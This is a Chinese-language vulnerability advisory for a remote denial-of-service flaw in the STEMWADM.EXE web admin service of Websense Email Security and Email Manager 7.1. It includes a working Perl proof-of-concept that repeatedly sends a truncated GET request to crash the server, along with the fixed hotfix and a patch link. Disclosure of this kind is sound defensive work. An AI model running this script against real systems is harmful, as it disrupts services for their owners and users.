Websense Email Security和Email Manager ‘STEMWADM.EXE’远程拒绝服务漏洞

漏洞起因
设计错误
 
影响系统
Websense Email Security 7.1
Websense Email Manager 7.1
 
不受影响系统
Websense Email Security 7.1 Hotfix 4
Websense Email Manager 7.1 Hotfix 4
 
危害
远程攻击者可以利用漏洞使服务程序崩溃。
 
攻击所需条件
攻击者必须访问Websense Email Security software。
 
漏洞信息
Websense Email Security software是一款内容安全智能保护解决方案,可对Email进行安全保护。Websense Email Security Web管理是一个WEB前端,用于访问消息管理,目录管理和查看日志。
Web管理全段(STEMWADM.EXE)默认监听8181端口,如果攻击者发送HTTP请求给8181端口并不等待服务器的应答,WEB服务将崩溃。
发送"GET /index.asp请求并关闭套接字,服务程序将不会应答任何请求并崩溃。
 
测试方法
#!/usr/bin/perl
use Socket;
(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
"<target> <port> \n";
print "\nThe Webserver on
http://$target:$port should be dead until",
"this script is running\n";
while (1) {
$ip = inet_aton($target) || die "host($target) not found.\n";
$sockaddr = pack_sockaddr_in($port, $ip);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
print SOCKET "GET /index.asp";
print "Request sent …\n";
close(SOCKET);
sleep 1;
};
 
厂商解决方案
用户可参考如下供应商提供的补丁程序:
http://tinyurl.com/yhe3hqa
 
漏洞提供者
NSO Research

发表评论?

0 条评论。

发表评论